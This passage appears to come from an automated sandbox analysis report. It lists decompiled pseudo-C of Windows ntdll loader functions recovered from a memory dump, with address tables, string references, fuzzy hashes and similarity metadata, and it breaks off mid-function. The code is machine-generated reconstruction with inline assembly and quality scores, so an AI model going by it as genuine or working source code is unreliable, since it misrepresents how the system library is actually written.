				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x11ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x11e8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x11e5780 & 0x00000003) != 0) {
							E01175510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x11e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0113B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x11e7984; // 0xca2b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x11e8464; // 0x75150110
					 *0x11eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01129B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x11e5780 & 0x00000005) != 0) {
						_push(_t49);
						E01175510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01128e0f
0x01128e16
0x01128e19
0x01128e1b
0x01128e21
0x01128e7f
0x01128e85
0x01169354
0x0116936c
0x01169371
0x0116937b
0x01169381
0x01169381
0x0116937b
0x01128e9d
0x01128e9d
0x01128e29
0x01128e2c
0x01128e38
0x01128e3e
0x01128e43
0x01128eb5
0x01128eb9
0x011692aa
0x011692af
0x011692e8
0x011692e8
0x011692af
0x01128eb9
0x01128e45
0x01128e53
0x01128e5b
0x01128e5f
0x01128e78
0x01128e78
0x01128e7d
0x01128ec3
0x01128ecd
0x01128ed2
0x01128ed2
0x01128ec5
0x01128ec5
0x00000000
0x01128e7d
0x01128e67
0x01128ea4
0x0116931a
0x00000000
0x00000000
0x01169320
0x01128ea4
0x01128e70
0x01169325
0x01169340
0x01169345
0x01169345
0x01128e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 01169331, 0116935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01169357
minkernel\ntdll\ldrsnap.c, xrefs: 0116933B, 01169367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0116932A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 66293d3b80e286f2e47b5328756e576c7acad89fe477b779650142e9c90b176e
Instruction ID: 974b0b729be5121c6ea0164227d1d381efe7e0f73cd0fafbb3f543cf283a41ce
Opcode Fuzzy Hash: 66293d3b80e286f2e47b5328756e576c7acad89fe477b779650142e9c90b176e
Instruction Fuzzy Hash: B5410832A403359FEB3EAB9CC849A76B6F5FB0065CF0A4179E9545B152E7709DE08382

Uniqueness

Uniqueness Score: -1.00%

Function 01108794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01108794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0110934A() != 0) {
								_t159 = E0117A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x11e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01175510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x11e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0110849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01108999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01108999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x11e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x11e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01112280(_t92, 0x11e86cc);
															_t94 = E011C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x11e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01108A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x11e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x11e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0113F380(_t136, 0x10d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01112280(_t108, 0x11e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E011C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0110FFB0(_t118, _t156, 0x11e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01139A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01108799
0x0110879d
0x011087a1
0x011087a3
0x011087a8
0x011087c3
0x011087c3
0x011087c8
0x011087d1
0x011087d4
0x011087d8
0x011087e5
0x011087ec
0x01159bfe
0x01159c00
0x01159c02
0x01159c08
0x01159c0d
0x01159c0f
0x01159c14
0x01159c2d
0x01159c32
0x01159c37
0x01159c3a
0x01159c3c
0x01159c42
0x01159c42
0x01159c3c
0x01159c02
0x011087da
0x011087df
0x011087e3
0x00000000
0x00000000
0x011087e3
0x011087f2
0x00000000
0x011087fb
0x011087fd
0x011087fe
0x0110880e
0x0110880f
0x01108810
0x01108814
0x0110881a
0x0110881c
0x0110881f
0x01108821
0x01108822
0x01108824
0x01108826
0x0110882c
0x0110882e
0x01159c48
0x01159c48
0x01108834
0x01108834
0x01108837
0x00000000
0x00000000
0x01108837
0x0110882e
0x0110883d
0x01108840
0x01108843
0x01108846
0x01108849
0x0110884c
0x0110884e
0x01108850
0x01108852
0x01108854
0x01108857
0x011088b4
0x011088b6
0x011088b6
0x01108859
0x01108859
0x01108859
0x01108861
0x01108866
0x0110886a
0x0110893d
0x01108941
0x00000000
0x01108947
0x01108947
0x0110894a
0x0110894c
0x00000000
0x01108952
0x01108955
0x0110895a
0x0110895d
0x0110895d
0x0110895f
0x01108961
0x01108961
0x01108968
0x00000000
0x00000000
0x0110896a
0x0110896b
0x0110896e
0x00000000
0x01108970
0x01108970
0x01108970
0x01108970
0x01108972
0x01108972
0x01108974
0x00000000
0x0110897a
0x0110897a
0x0110897d
0x00000000
0x01108983
0x01159c65
0x01159c6d
0x01159c72
0x01159c75
0x01159c75
0x01159c82
0x01159c86
0x01159c87
0x01159c88
0x01159c89
0x01159c8c
0x01159c90
0x01159c95
0x01159c97
0x01159ca0
0x01159ca3
0x01159ca9
0x01159ca9
0x00000000
0x01159ca9
0x01159ca3
0x00000000
0x01159c97
0x0110897d
0x00000000
0x01108974
0x01108988
0x01108992
0x01108996
0x00000000
0x01108996
0x0110894c
0x00000000
0x01108870
0x0110887b
0x0110887d
0x0110887f
0x01108881
0x01108884
0x01108884
0x01108886
0x01108889
0x0110888c
0x0110888e
0x01108891
0x01108891
0x01108898
0x00000000
0x00000000
0x0110889a
0x0110889b
0x0110889e
0x00000000
0x00000000
0x011088a0
0x011088a8
0x011088b0
0x011088b2
0x011088d3
0x011088d5
0x00000000
0x011088d7
0x011088db
0x011088dc
0x011088e0
0x011088e8
0x011088ee
0x011088f0
0x011088f3
0x011088fc
0x01108901
0x01108906
0x0110890c
0x0110890c
0x0110890f
0x01108916
0x01108917
0x01108918
0x01108919
0x0110891a
0x0110891f
0x01108921
0x01159c52
0x01159c55
0x01159c5b
0x01159cac
0x01159cc0
0x01159cc0
0x01159c55
0x01108927
0x01108927
0x0110892f
0x01108933
0x00000000
0x011088f5
0x011088f5
0x00000000
0x011088f7
0x011088f7
0x011088fa
0x00000000
0x00000000
0x00000000
0x00000000
0x011088fa
0x011088f5
0x011088f3
0x00000000
0x011088d5
0x00000000
0x011088b2
0x011088c9
0x00000000
0x011088c9
0x0110887f
0x0110886a
0x01108857
0x01108852
0x011088bf
0x011088bf
0x011087aa
0x011087ad
0x011087ae
0x011087b4
0x011087b5
0x011087b6
0x011087b8
0x011087bd
0x011087c1
0x011087f4
0x011087fa
0x00000000
0x00000000
0x00000000
0x011087c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01159C18
LdrpDoPostSnapWork, xrefs: 01159C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01159C28

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 4e3604cd54eeb3e3160d0db14ceceab0da422a9189303fd91b683231656137f5
Instruction ID: 0fec9a9bbce3d09a26e945de1f2315661fc6aa09f30003da40566c3713d861be
Opcode Fuzzy Hash: 4e3604cd54eeb3e3160d0db14ceceab0da422a9189303fd91b683231656137f5
Instruction Fuzzy Hash: F4915931E0461ADFDF1EDF98C4809BA77B5FF84318B15406AD905AB281E7B0EE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01107E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01107E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0110CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E010FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x11e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01175510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x11e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01117D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01117D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01177016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01117D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01117D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01177016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0112A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E010FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01107e4c
0x01107e50
0x01107e55
0x01107e58
0x01107e5d
0x01107e71
0x01107f33
0x01107e77
0x01107e77
0x01107e79
0x01107e79
0x01107e7e
0x01107f45
0x01159848
0x00000000
0x01159848
0x01107f4e
0x01107f53
0x01107f5a
0x00000000
0x00000000
0x0115985a
0x01159862
0x01159866
0x00000000
0x0115986c
0x00000000
0x0115986c
0x01107e84
0x01107e84
0x01107e8d
0x01159871
0x01107eb8
0x01107ec0
0x01107ec0
0x01107e9a
0x0115987e
0x00000000
0x00000000
0x01159884
0x0115988b
0x011598a7
0x011598ac
0x011598b1
0x011598b6
0x011598b8
0x011598b8
0x011598b9
0x00000000
0x011598b9
0x01107ea0
0x01107ea7
0x00000000
0x00000000
0x01107eac
0x01107eb1
0x01107ec6
0x01107ed0
0x011598cc
0x01107ed6
0x01107ed6
0x01107ed6
0x01107ede
0x01107ee3
0x011598e3
0x011598f0
0x01159902
0x011598f2
0x011598fb
0x011598fb
0x01159907
0x0115991d
0x0115991d
0x01159907
0x011598e3
0x01107ef0
0x01107f14
0x01107f14
0x01107f1e
0x01159946
0x01107f24
0x01107f24
0x01107f24
0x01107f2c
0x0115996a
0x01159975
0x01159975
0x0115997e
0x01159993
0x01159993
0x0115997e
0x00000000
0x01107ef2
0x01107efc
0x01107f0a
0x01107f0e
0x01159933
0x00000000
0x01159933
0x00000000
0x01107f0e
0x00000000
0x00000000
0x00000000
0x01107eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01159891
LdrpCompleteMapModule, xrefs: 01159898
minkernel\ntdll\ldrmap.c, xrefs: 011598A2

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 49cfecc86bd9738cc0dc9dcd437b6c01233ee3c7fe75881d0cb1ec193429dce5
Instruction ID: 77a9d00978c2c6072bb62875f9e8f333ea6379657ef836c58e0b263dd6bf954d
Opcode Fuzzy Hash: 49cfecc86bd9738cc0dc9dcd437b6c01233ee3c7fe75881d0cb1ec193429dce5
Instruction Fuzzy Hash: 3551F431A01749DBEB2ECB5CC944B6ABBE4AF01318F1405A9E9A19B7D1D7B4FD00C752

Uniqueness

Uniqueness Score: -1.00%

Function 010FE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E010FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011395D0();
						}
						if(_t78 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0113FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0113BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01139600();
					if(_t97 < 0) {
						goto L6;
					}
					E0113BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L010FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0113BB40(_t83, _t102 + 0x24, _t78);
								if(L011043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0113BB40(_t84, _t102 + 0x24, _t94);
									if(L011043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x010fe620
0x010fe628
0x010fe62f
0x010fe631
0x010fe635
0x010fe637
0x010fe63e
0x01155503
0x01155503
0x010fe64c
0x010fe64c
0x010fe651
0x00000000
0x00000000
0x010fe661
0x010fe665
0x0115542a
0x010fe715
0x010fe71a
0x010fe71c
0x010fe720
0x010fe720
0x010fe727
0x010fe736
0x010fe736
0x010fe743
0x010fe743
0x010fe673
0x010fe678
0x010fe67d
0x010fe682
0x010fe685
0x010fe692
0x010fe69b
0x010fe6a3
0x010fe6ad
0x010fe6b1
0x010fe6b2
0x010fe6bb
0x010fe6bf
0x010fe6c0
0x010fe6c8
0x010fe6cc
0x010fe6d5
0x010fe6d9
0x00000000
0x00000000
0x010fe6e5
0x010fe6ea
0x010fe6f9
0x010fe70b
0x010fe70f
0x01155439
0x0115545e
0x0115545e
0x00000000
0x0115545e
0x0115543b
0x0115543e
0x01155440
0x01155445
0x01155472
0x01155475
0x0115548d
0x01155493
0x011554a9
0x00000000
0x00000000
0x011554ab
0x011554b4
0x011554bc
0x011554c8
0x011554de
0x011554fb
0x011554e0
0x011554e6
0x011554eb
0x011554eb
0x011554de
0x00000000
0x011554bc
0x01155477
0x0115547a
0x01155480
0x01155483
0x01155486
0x0115548b
0x00000000
0x00000000
0x00000000
0x0115548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01155447
0x01155447
0x01155447
0x01155447
0x0115544e
0x00000000
0x00000000
0x01155450
0x01155452
0x01155455
0x0115545a
0x00000000
0x00000000
0x00000000
0x0115545c
0x0115546a
0x0115546d
0x0115546f
0x00000000
0x0115546f
0x010fe70f

Strings

@, xrefs: 010FE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010FE68C
InstallLanguageFallback, xrefs: 010FE6DB

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 0ccd458ce6d97943bcb57f7df6620105bf5c0a4546eb140d5ce2b68207d275a6
Instruction ID: 75600b21769e481c69d9ba9350ccce22dd32b86b6ee86ed1f048179b50483adf
Opcode Fuzzy Hash: 0ccd458ce6d97943bcb57f7df6620105bf5c0a4546eb140d5ce2b68207d275a6
Instruction Fuzzy Hash: 1E51E572508306DBD758DF68C440A6BB7E9BF88718F05092EFA95D7650FB34D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 011BE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E011BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

